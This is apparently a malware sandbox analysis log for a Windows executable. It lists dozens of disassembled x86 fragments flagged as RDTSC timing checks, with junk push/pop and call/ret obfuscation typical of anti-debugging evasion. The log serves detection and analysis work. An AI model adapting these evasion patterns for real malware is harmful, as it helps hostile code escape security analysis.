                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB89A second address: 5EB89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB89E second address: 5EB8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB8A8 second address: 5EB8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB9A1 second address: 5EB9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EB9A6 second address: 5EB9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F909C7BD306h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBA60 second address: 5EBA77 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F909CBB3518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F909CBB3520h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBF62 second address: 5EBF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EBF66 second address: 5EBFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 and esi, 1892C4DCh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F909CBB3518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e movzx edi, bx 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F909CBB351Fh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EC98F second address: 5EC994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EC994 second address: 5EC9D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F909CBB3518h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 xor di, D554h 0x00000028 mov dword ptr [ebp+122D1C2Ch], ecx 0x0000002e push 00000000h 0x00000030 adc edi, 5BFE3AF0h 0x00000036 push 00000000h 0x00000038 stc 0x00000039 xchg eax, ebx 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEE2 second address: 5EEEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEE8 second address: 5EEEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEC7A second address: 5EEC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEEEC second address: 5EEF78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F909CBB3518h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a jl 00007F909CBB3519h 0x00000030 mov di, cx 0x00000033 xor edi, dword ptr [ebp+122D34C4h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F909CBB3518h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov esi, dword ptr [ebp+122D34C0h] 0x0000005b or edi, 08282340h 0x00000061 push eax 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEF78 second address: 5EEF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EEF7C second address: 5EEF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EFA68 second address: 5EFA79 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EF7A8 second address: 5EF7AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EFA79 second address: 5EFA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EF7AC second address: 5EF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F02F9 second address: 5F0311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F0311 second address: 5F0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909CBB351Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F10B0 second address: 5F10CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F909C7BD316h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F0323 second address: 5F0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F909CBB351Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F10CD second address: 5F114E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F909C7BD308h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+122D1AF4h], eax 0x0000002c mov dword ptr [ebp+124681B6h], eax 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F909C7BD308h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e stc 0x0000004f xchg eax, ebx 0x00000050 jp 00007F909C7BD314h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F909C7BD30Eh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F114E second address: 5F1158 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F2B1F second address: 5F2B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2165 second address: 5B2171 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2171 second address: 5B2175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2175 second address: 5B2179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B2179 second address: 5B217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5B217F second address: 5B218B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F909CBB3516h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F47AC second address: 5F47B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F47B1 second address: 5F47D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3521h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007F909CBB3524h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F496A second address: 5F4990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007F909C7BD306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4990 second address: 5F4999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4999 second address: 5F499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F676D second address: 5F678D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F909CBB3521h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jnc 00007F909CBB3516h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F678D second address: 5F6792 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F499D second address: 5F4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB351Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F909CBB3518h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D24E7h] 0x0000002b or ebx, dword ptr [ebp+122D328Eh] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov ebx, 2F20A7F7h 0x0000003d mov ebx, dword ptr [ebp+122D308Eh] 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a js 00007F909CBB351Ch 0x00000050 mov ebx, dword ptr [ebp+12457851h] 0x00000056 mov eax, dword ptr [ebp+122D111Dh] 0x0000005c push 00000000h 0x0000005e push ebx 0x0000005f call 00007F909CBB3518h 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], ebx 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc ebx 0x00000072 push ebx 0x00000073 ret 0x00000074 pop ebx 0x00000075 ret 0x00000076 push FFFFFFFFh 0x00000078 mov ebx, dword ptr [ebp+122D35D4h] 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 jl 00007F909CBB3516h 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4A3E second address: 5F4A48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7645 second address: 5F764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F764A second address: 5F7660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD312h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7660 second address: 5F76B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F909CBB3518h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov di, 4F5Dh 0x0000002d jmp 00007F909CBB3526h 0x00000032 push 00000000h 0x00000034 mov ebx, ecx 0x00000036 push 00000000h 0x00000038 mov ebx, 3DB4E092h 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F4A48 second address: 5F4A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F87F5 second address: 5F87FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F909CBB351Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F6897 second address: 5F689C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F69AF second address: 5F69B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F69B3 second address: 5F69B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9767 second address: 5F9784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9784 second address: 5F978A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F978A second address: 5F978E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F978E second address: 5F9792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F9792 second address: 5F9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F909CBB3518h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jmp 00007F909CBB3525h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F909CBB3518h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov edi, edx 0x00000048 movzx edi, di 0x0000004b xchg eax, esi 0x0000004c je 00007F909CBB3535h 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F781C second address: 5F7820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5F7820 second address: 5F7826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FB8DA second address: 5FB8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD319h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FC8E5 second address: 5FC8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FC8E9 second address: 5FC909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F909C7BD317h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FA986 second address: 5FA98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA1B second address: 5FAA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F909C7BD306h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F909C7BD311h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA3F second address: 5FAA44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FAA44 second address: 5FAA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD79A second address: 5FD79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD79E second address: 5FD7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD7A4 second address: 5FD7BE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F909CBB3518h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jng 00007F909CBB3518h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FD7BE second address: 5FD7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FBB58 second address: 5FBB5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5FE56A second address: 5FE574 instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FF56B second address: 5FF574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 600599 second address: 60059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FE68B second address: 5FE68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FE68F second address: 5FE695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60363E second address: 6036E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push ebx 0x0000000e jmp 00007F909CBB3522h 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F909CBB3518h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24D3h], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F909CBB3518h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 call 00007F909CBB3520h 0x00000057 xor dword ptr [ebp+124681B6h], edx 0x0000005d pop ebx 0x0000005e and edi, 122FD282h 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 jp 00007F909CBB3528h 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FCA28 second address: 5FCA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FCA2E second address: 5FCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5FCA33 second address: 5FCA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 6027AF second address: 6027B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 60391B second address: 603925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F909C7BD306h 0x0000000a rdtsc
